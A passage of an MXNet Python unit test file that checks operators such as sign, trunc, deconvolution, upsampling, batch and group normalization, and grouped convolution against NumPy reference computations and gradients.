arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.sign(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.sign(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2;
npout_grad = out_grad.asnumpy()
npout_grad = 0;
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
@with_seed()
def test_round_ceil_floor():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5.543
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]= 2
test = mx.sym.round(data) + mx.sym.ceil(data) + mx.sym.floor(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.round(data_tmp) + np.ceil(data_tmp) + np.floor(data_tmp)
assert_almost_equal(out, npout)
@with_seed()
def test_trunc():
data_tmp = np.random.rand(3, 4) * 10 - 5
arr_data = mx.nd.array(data_tmp)
data = mx.symbol.Variable('data')
test = mx.sym.trunc(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
# 'trunc' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
# Repro issue with seed 1660190454
npout = np.trunc(np.float32(data_tmp))
assert_almost_equal(out, npout)
@with_seed()
def test_rsqrt_cos_sin():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.rsqrt(data) + mx.sym.cos(data) + mx.sym.sin(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = 1/ np.sqrt(data_tmp) + np.cos(data_tmp) + np.sin(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * -(1.0 / (2.0 * data_tmp * np.sqrt(data_tmp))) + npout_grad * -1 * np.sin(data_tmp) + npout_grad * np.cos(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
@with_seed()
def test_maximum_minimum():
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp2 = np.random.rand(3,4)
data_tmp1[:] = 2
data_tmp2[:] = 3
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,data2) + mx.sym.minimum(data1,data2)
exe_test = test.bind(default_context(), args=[arr_data1,arr_data2], args_grad=[arr_grad1,arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,data_tmp2) + np.minimum(data_tmp1,data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > data_tmp2).astype('float')
mask2 = (data_tmp1 < data_tmp2).astype('float')
npout_grad1 = npout_grad * mask1 + npout_grad * mask2
npout_grad2 = (npout_grad - npout_grad * mask1) + (npout_grad - npout_grad * mask2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
@with_seed()
def test_maximum_minimum_scalar():
data1 = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp1[:] = 2
arr_data1 = mx.nd.array(data_tmp1)
arr_grad1 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,3) + mx.sym.maximum(9,data1) + mx.sym.minimum(5,data1) + mx.sym.minimum(data1,4)
exe_test = test.bind(default_context(), args=[arr_data1], args_grad=[arr_grad1])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,3) + np.maximum(9,data_tmp1) + np.minimum(5,data_tmp1) + np.minimum(data_tmp1,4)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > 3).astype('float')
mask2 = (9 > data_tmp1).astype('float')
mask3 = (5 < data_tmp1).astype('float')
mask4 = (data_tmp1 < 4).astype('float')
npout_grad1 = npout_grad * mask1 + (npout_grad - npout_grad * mask2) + (npout_grad - npout_grad * mask3) + npout_grad * mask4
assert_almost_equal(arr_grad1, npout_grad1)
@with_seed()
def test_abs():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.abs(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = abs(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2;
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * np.sign(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def check_deconvolution_forward_backward(input_shape, num_filter, kernel, stride, pad):
"""configure A: input --> conv --> deconv --> output.
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output, and the same weights between conv
and deconv;
If the input value of forward() and backwrad() is the same, then
the output value of them should also the same;
"""
assert input_shape[1] == num_filter
data = mx.sym.Variable(name="data")
conv = mx.sym.Convolution(
data=data, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
deconv = mx.sym.Deconvolution(
data=conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
input_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
out_grad = input_data
args = {}
args["data"] = input_data
args['conv_weight'] = args['deconv_weight'] = mx.random.normal(0, 1,
(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
args_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = deconv.bind(default_context(), args=args, args_grad=args_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
exe.backward(out_grad)
assert_almost_equal(out, args_grad[0], rtol=1E-3, atol=1e-3)
args_grad_addto_npy = [np.random.normal(size=s) for s in arg_shapes]
args_grad_addto = [mx.nd.array(ele) for ele in args_grad_addto_npy]
exe = deconv.bind(default_context(), args=args, args_grad=args_grad_addto, grad_req="add")
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(out_grad)
assert_almost_equal(out + args_grad_addto_npy[0], args_grad_addto[0].asnumpy(), rtol=1e-3, atol=1e-3)
def check_deconvolution_gradient(input_shape, num_filter, pad):
"""configure A: input --> conv --> output.
configure B: input --> deconv --> output
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output;
During backward(), if the input of A equals output of B, and the output
of A equals input of B, then the grad of weight should be the same;
"""
ndim = len(pad)
stride = (1,) * ndim
kernel = tuple(2 * np.array(pad) + 1)
data_conv = mx.sym.Variable(name="data_conv")
conv = mx.sym.Convolution(
data=data_conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
data_deconv = mx.sym.Variable(name="data_deconv")
deconv = mx.sym.Deconvolution(
data=data_deconv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
conv_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
conv_args = {}
conv_args["data_conv"] = conv_data
conv_args['conv_weight'] = \
mx.random.normal(0, 1,(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
conv_args_grad = [mx.nd.zeros(conv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
exe_conv = conv.bind(default_context(), args=conv_args, args_grad=conv_args_grad)
exe_conv.forward(is_train=True)
conv_out_grad = mx.random.normal(0, 2, exe_conv.outputs[0].shape, ctx=mx.cpu()).copyto(default_context())
exe_conv.backward(conv_out_grad)
deconv_data = conv_out_grad
deconv_args = {}
deconv_args['data_deconv'] = deconv_data
deconv_args['deconv_weight'] = conv_args['conv_weight']
deconv_args_grad = [mx.nd.zeros(deconv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad_npy = [np.random.normal(size=deconv_data.shape),
np.random.normal(size=(num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad = [mx.nd.array(deconv_addto_args_grad_npy[0]),
mx.nd.array(deconv_addto_args_grad_npy[1])]
exe_deconv = deconv.bind(default_context(), args=deconv_args, args_grad=deconv_args_grad)
exe_deconv.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1], deconv_args_grad[1], rtol=1e-3, atol=1e-2)
# Test AddTo
exe_deconv_addto = deconv.bind(default_context(), args=deconv_args,
args_grad=deconv_addto_args_grad,
grad_req="add")
exe_deconv_addto.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv_addto.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1].asnumpy() + deconv_addto_args_grad_npy[1],
deconv_addto_args_grad[1].asnumpy(), rtol=1e-3, atol=1e-2)
def check_deconvolution_target_shape(input_shape, kernel, stride, pad, adj, target_shape=None):
data = mx.sym.Variable(name="data")
if target_shape:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5,
target_shape = target_shape)
else:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5)
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
default_target_size = 8
if target_shape is None:
target_shape = (default_target_size,) * len(kernel)
assert out_shapes[0] == (input_shape[0], 5) + target_shape
@with_seed()
def test_deconvolution():
# 2D
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
target_shape = (8,8),
pad = (99,99), # will be ignored
adj = (101,101), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
pad = (1,1),
adj = (1,1),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5,5),
num_filter = 1,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28,28),
num_filter = 3,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403, 403),
num_filter = 3,
kernel = (7,7),
stride = (5,5),
pad = (2,2)
)
check_deconvolution_gradient(
input_shape = (1,3,5,5),
num_filter = 3,
pad = (1,1)
)
check_deconvolution_gradient(
input_shape = (5,3,100,100),
num_filter = 3,
pad = (3,3)
)
# 1D
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
target_shape = (8,),
pad = (99,), # will be ignored
adj = (101,), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
pad = (1,),
adj = (1,),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5),
num_filter = 1,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28),
num_filter = 3,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403),
num_filter = 3,
kernel = (7,),
stride = (5,),
pad = (2,)
)
check_deconvolution_gradient(
input_shape = (1,3,5),
num_filter = 3,
pad = (1,)
)
check_deconvolution_gradient(
input_shape = (5,3,100),
num_filter = 3,
pad = (3,)
)
@with_seed()
def test_deconvolution_forward_with_bias():
"""Check if deconvolution forward can work well with bias=True
"""
def check_deconvolution_forward_with_bias(shape=(1, 16, 5, 5), num_filter=32, num_group=1, kernel=(3, 3), pad=(1, 1)):
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
input_data = mx.random.uniform(-5, 5, shape, ctx=mx.cpu())
y = mx.sym.Deconvolution(data=x, weight=w, num_filter=num_filter, num_group=num_group, kernel=kernel, no_bias=False, pad=pad)
exe = y.simple_bind(ctx=mx.cpu(), x=shape, grad_req='null')
exe.arg_arrays[0][:] = np.random.normal(size=exe.arg_arrays[0].shape)
exe.arg_arrays[1][:] = np.random.normal(size=exe.arg_arrays[1].shape)
exe.forward(is_train=False)
o = exe.outputs[0]
t = o.asnumpy()
check_deconvolution_forward_with_bias((1, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((32, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((1, 16, 5, 5), 32, 1, (3, 3), (1, 1))
check_deconvolution_forward_with_bias((32, 16, 5, 5), 32, 1, (3, 3), (1, 1))
def check_nearest_upsampling_with_shape(shapes, scale, root_scale):
arr = {'arg_%d'%i: mx.random.uniform(-10.0, 10.0, shape, ctx=mx.cpu()).copyto(default_context()) for i, shape in zip(range(len(shapes)), shapes)}
arr_grad = {'arg_%d'%i: mx.nd.zeros(shape) for i, shape in zip(range(len(shapes)), shapes)}
up = mx.sym.UpSampling(*[mx.sym.Variable('arg_%d'%i) for i in range(len(shapes))], sample_type='nearest', scale=root_scale)
exe = up.bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
exe.backward(exe.outputs)
for k in range(len(shapes)):
name = 'arg_%d'%k
assert_allclose(arr[name].asnumpy()*root_scale**2*scale**(2*k), arr_grad[name].asnumpy(), rtol=1e-4)
def check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter):
def _init_bilinear(arr, f):
weight = np.zeros(np.prod(arr.shape), dtype='float32')
shape = arr.shape
c = (2 * f - 1 - f % 2) / (2. * f)
for i in range(np.prod(shape)):
x = i % shape[3]
y = (i // shape[3]) % shape[2]
weight[i] = (1 - abs(x / f - c)) * (1 - abs(y / f - c))
arr[:] = weight.reshape(shape)
return arr
up = mx.sym.UpSampling(mx.sym.Variable("data"),
mx.sym.Variable('weight'), sample_type='bilinear', scale=root_scale,
num_filter=num_filter, num_args=2)
arg_shapes, out_shapes, _ = up.infer_shape(data=data_shape)
arr = {'data': mx.random.uniform(-5, 5, data_shape, ctx=mx.cpu()).copyto(default_context()),
'weight': mx.nd.array(_init_bilinear(mx.ndarray.empty(arg_shapes[1]).asnumpy(), root_scale))}
arr_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = up.bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(exe.outputs)
target_shape = (data_shape[2] * root_scale, data_shape[3] * root_scale)
assert out.shape == data_shape[:2] + target_shape
@with_seed()
def test_nearest_upsampling():
for root_scale in [1,2,3]:
for scale in [1,2,3]:
for num_shape in [1,2,3]:
for base in [1,2,3]:
shapes = [(1,3,base*root_scale*scale**(num_shape-1-i),base*root_scale*scale**(num_shape-1-i)) for i in range(num_shape)]
check_nearest_upsampling_with_shape(shapes, scale, root_scale)
@with_seed()
def test_bilinear_upsampling():
rootscale = [2,3]
scales = [1,2,3]
filters = [1,2,3]
bases = [1,2,3]
for params in itertools.product(rootscale, scales, filters, bases):
root_scale, scale, num_filter, base = params
# bilinear upsampling takes only 1 data and 1 weight
# multi input mode is not applicable
dimension = base*root_scale*scale
kernel = 2 * root_scale - root_scale % 2
data_shape = (1, num_filter, dimension, dimension)
weight_shape = (1, num_filter, kernel, kernel)
check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter)
@with_seed()
def test_batchnorm_training():
def check_batchnorm_training(stype):
for shape in [(2, 3), (2, 3, 2, 2), (2, 8, 2, 2)]:
data_tmp = np.random.normal(-0.1, 0.1, size=shape)
s = shape[1],
gamma = np.ones(s)
beta = np.ones(s)
gamma[1] = 3
beta[0] = 3
rolling_mean = np.random.uniform(size=s)
rolling_std = np.random.uniform(size=s)
data = mx.symbol.Variable('data', stype=stype)
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
mean_std = [mx.nd.array(rolling_mean).tostype(stype), mx.nd.array(rolling_std).tostype(stype)]
test = mx.symbol.BatchNorm_v1(data, fix_gamma=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=True, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=False)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=False, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
# Test varying channel axis
dim = len(shape)
for chaxis in range(-dim, dim):
chaxis_true = chaxis
if chaxis < 0:
chaxis_true = dim + chaxis
shapex = shape
channel_count = shapex[chaxis_true]
data_tmp = np.random.normal(-0.1, 0.1, size=shapex)
gamma = np.ones(channel_count)
beta = np.ones(channel_count)
if channel_count > 1:
gamma[1] = 3
beta[0] = 3
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
xrolling_mean = np.random.uniform(size=channel_count)
xrolling_std = np.random.uniform(size=channel_count)
xmean_std = [mx.nd.array(xrolling_mean).tostype(stype),
mx.nd.array(xrolling_std).tostype(stype)]
test = mx.symbol.BatchNorm(data, fix_gamma=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
check_batchnorm_training('default')
@with_seed()
def test_batchnorm():
momentum = 0.9
epsilon = 1e-5
def _test_batchnorm_impl(op, shape, axis, cudnn_off, output_mean_var):
print(str((op, shape, axis, cudnn_off)))
kwargs = dict(output_mean_var=output_mean_var)
if op == mx.nd.contrib.SyncBatchNorm:
if axis != 1:
return
key = str(op) + str(shape) + str(axis)
kwargs.update(dict(key=key))
if cudnn_off:
return
else:
kwargs.update(dict(axis=axis, cudnn_off=cudnn_off))
nch = shape[axis]
bn_gamma = mx.nd.random.uniform(shape=(nch,))
bn_gamma.attach_grad()
bn_beta = mx.nd.random.uniform(shape=(nch,))
bn_beta.attach_grad()
bn_running_mean = mx.nd.zeros(nch)
bn_running_var = mx.nd.ones(nch)
running_mean = mx.nd.zeros(nch)
running_var = mx.nd.ones(nch)
num_iters = 10
expand_shape = [1] * len(shape)
expand_shape[axis] = shape[axis]
for _ in range(num_iters):
data = mx.nd.random.uniform(shape=shape)
data.attach_grad()
ograd = mx.nd.random.uniform(shape=shape)
with mx.autograd.record():
output = op(data, bn_gamma, bn_beta,
bn_running_mean, bn_running_var,
momentum=momentum, eps=epsilon,
fix_gamma=False, **kwargs)
if output_mean_var:
output, output_mean, output_std = output
output.backward(ograd)
mx.nd.waitall()
data_mean = data.mean(
axis=axis, exclude=True, keepdims=True)
data_var = (data - data_mean).square().mean(axis=axis,
exclude=True,
keepdims=True)
target_output = (data - data_mean) / \
(data_var + epsilon).sqrt() * \
bn_gamma.reshape(expand_shape) + \
bn_beta.reshape(expand_shape)
# squeeze data_mean and data_var
data_mean_flat = data_mean.squeeze()
data_var_flat = data_var.squeeze()
running_mean = running_mean * momentum + \
data_mean_flat * (1 - momentum)
running_var = running_var * momentum + \
data_var_flat * (1 - momentum)
W = bn_gamma.reshape(expand_shape)
dnx = ograd * W
xsm = data - data_mean
nd = 1.0 / mx.nd.sqrt(data_var + epsilon)
nx = xsm * nd
m = np.prod(shape) / shape[axis]
dvar = (dnx * xsm).sum(axis=axis, keepdims=True,
exclude=True) * (-0.5) * mx.nd.power(nd, 3)
dmean = -nd * dnx.sum(axis=axis, keepdims=True, exclude=True) - \
dvar * xsm.mean(axis=axis, keepdims=True,
exclude=True) * 2.0
dX = dnx * nd + dvar * xsm * (2.0 / m) + dmean * (1.0 / m)
dW = (ograd * nx).sum(axis=axis, exclude=True)
db = ograd.sum(axis=axis, exclude=True)
atol = 1e-2
rtol = 1e-2
if output_mean_var:
assert_almost_equal(output_mean.asnumpy(),
data_mean_flat.asnumpy(),
atol=atol, rtol=rtol)
if op != mx.nd.contrib.SyncBatchNorm:
assert_almost_equal(output_std.asnumpy(),
(1.0 / (data_var_flat +
epsilon).sqrt()).asnumpy(),
atol=atol, rtol=rtol)
else:
assert_almost_equal(output_std.asnumpy(),
data_var_flat.asnumpy(),
atol=atol, rtol=rtol)
assert_almost_equal(output.asnumpy(), target_output.asnumpy(),
atol=atol, rtol=rtol)
assert_almost_equal(bn_running_mean.asnumpy(
), running_mean.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(bn_running_var.asnumpy(
), running_var.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(data.grad.asnumpy(),
dX.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(
bn_gamma.grad.asnumpy(), dW.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(
bn_beta.grad.asnumpy(), db.asnumpy(), atol=atol, rtol=rtol)
for op in [mx.nd.BatchNorm, mx.nd.contrib.SyncBatchNorm]:
for shape in [(24, 2), (24, 3, 4), (24, 4, 4, 4), (24, 8, 4, 4), (24, 5, 6, 4, 4)]:
for axis in range(len(shape)):
for cudnn_off in [False, True]:
for output_mean_var in [False, True]:
_test_batchnorm_impl(op, shape, axis,
cudnn_off, output_mean_var)
@with_seed()
def test_groupnorm():
acc_types = {'float16': 'float32', 'float32': 'float64', 'float64': 'float64'}
def x_hat_helper(x, num_groups, eps):
dtype = x.dtype
dshape = x.shape
assert len(dshape) == 4
acc_type = acc_types[str(dtype)]
new_shape = (dshape[0], num_groups, int(dshape[1] / num_groups), dshape[2], dshape[3])
new_moments_shape = (dshape[0], num_groups, 1, 1, 1)
data = x.reshape(new_shape)
mean = np.mean(data, axis=(2, 3, 4), keepdims=False, dtype=acc_type).astype(dtype)
std = np.sqrt(np.var(data, axis=(2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype) + eps)
x_hat = (data - mean.reshape(new_moments_shape)) / std.reshape(new_moments_shape)
return x_hat, mean, std
def np_groupnorm(data, gamma, beta, num_groups, eps):
new_param_shape = (1, num_groups, 1, 1, 1)
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
out = x_hat * gamma.reshape(new_param_shape) + beta.reshape(new_param_shape)
return out.reshape(dshape), mean, std
def np_groupnorm_grad(ograd, data, gamma, beta, mean, std, num_groups, eps):
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
new_shape = x_hat.shape
dshape = data.shape
dtype = data.dtype
new_moments_shape = (new_shape[0], num_groups, 1, 1, 1)
new_param_shape = (1, num_groups, 1, 1, 1)
acc_type = acc_types[str(dtype)]
ograd = ograd.reshape(new_shape)
data = data.reshape(new_shape)
gamma = gamma.reshape(new_param_shape)
beta = beta.reshape(new_param_shape)
mean = mean.reshape(new_moments_shape)
std = std.reshape(new_moments_shape)
beta_grad = np.sum(ograd, axis=(0, 2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype)
gamma_grad = np.sum(x_hat * ograd, axis=(0, 2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype)
x_hat_grad = ograd * gamma
ograd_mult = x_hat_grad / std
red_out = np.mean(ograd_mult, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = ograd_mult - red_out
red_out = np.mean(ograd_mult * x_hat, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = data_grad - x_hat * red_out
return data_grad.reshape(dshape), gamma_grad, beta_grad
batch_size = random.randint(1, 8)
num_groups = random.randint(2, 3)
num_channels = random.randint(2, 3) * num_groups
height = random.randint(1, 5)
width = random.randint(1, 5)
dshape = (batch_size, num_channels, height, width)
param_shape = (num_groups,)
temp_shape = (batch_size, num_groups, int(num_channels / num_groups), height, width)
np_data = np.random.uniform(0.2, 1.0, dshape)
np_gamma = np.random.uniform(-1.0, 1.0, param_shape)
np_beta = np.random.uniform(-1.0, 1.0, param_shape)
data_sym = mx.sym.Variable("data")
gamma_sym = mx.sym.Variable("gamma")
beta_sym = mx.sym.Variable("beta")
for dtype in [np.float16, np.float32, np.float64]:
eps = 1e-2 if dtype == np.float16 else 1e-5
mx_data = mx.nd.array(np_data, dtype=dtype)
mx_gamma = mx.nd.array(np_gamma, dtype=dtype)
mx_beta = mx.nd.array(np_beta, dtype=dtype)
np_out, np_mean, np_std = np_groupnorm(np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
num_groups=num_groups,
eps=eps)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=True)
check_symbolic_forward(mx_sym, [mx_data, mx_gamma, mx_beta], [np_out, np_mean, np_std],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-3 if dtype == np.float16 else 1e-4, dtype=dtype)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=False)
np_ograd = np.random.uniform(-1.0, 1.0, dshape).astype(dtype)
np_data_grad, np_gamma_grad, np_beta_grad = np_groupnorm_grad(np_ograd,
np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
np_mean, np_std,
num_groups, eps)
check_symbolic_backward(mx_sym, [mx_data, mx_gamma, mx_beta], [mx.nd.array(np_ograd)],
[np_data_grad, np_gamma_grad, np_beta_grad],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-2 if dtype == np.float16 else 1e-4, dtype=dtype)
@with_seed()
def test_convolution_grouping():
for dim in [1, 2, 3]:
num_filter = 4
for num_group in [1, 2]:
kernel = (3,) * dim
shape = (1, 4) + (9,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group, kernel=kernel)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel)
for i in range(num_group)])
exe1 = y1.simple_bind(default_context(), x=shape)
exe2 = y2.simple_bind(default_context(), x=shape, w=(num_filter, shape[1]//num_group) + kernel, b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.float32(np.random.normal(size=arr1.shape))
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
np.testing.assert_allclose(arr1.asnumpy(), arr2.asnumpy(), rtol=1e-3, atol=1e-3)
@unittest.skip("Flaky test https://github.com/apache/incubator-mxnet/issues/14052")
@with_seed()
def test_depthwise_convolution():
for dim in [1,2]:
for num_base in [1, 4, 16, 32, 64]:
for kernel_x in [3, 5]:
for stride_x in [1, 2]:
for pad_x in [0, 1]:
for in_size in [7, 32]:
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
num_group = num_base
shape = (2, num_base) + (in_size,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group,
kernel=kernel, stride=stride, pad=pad)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
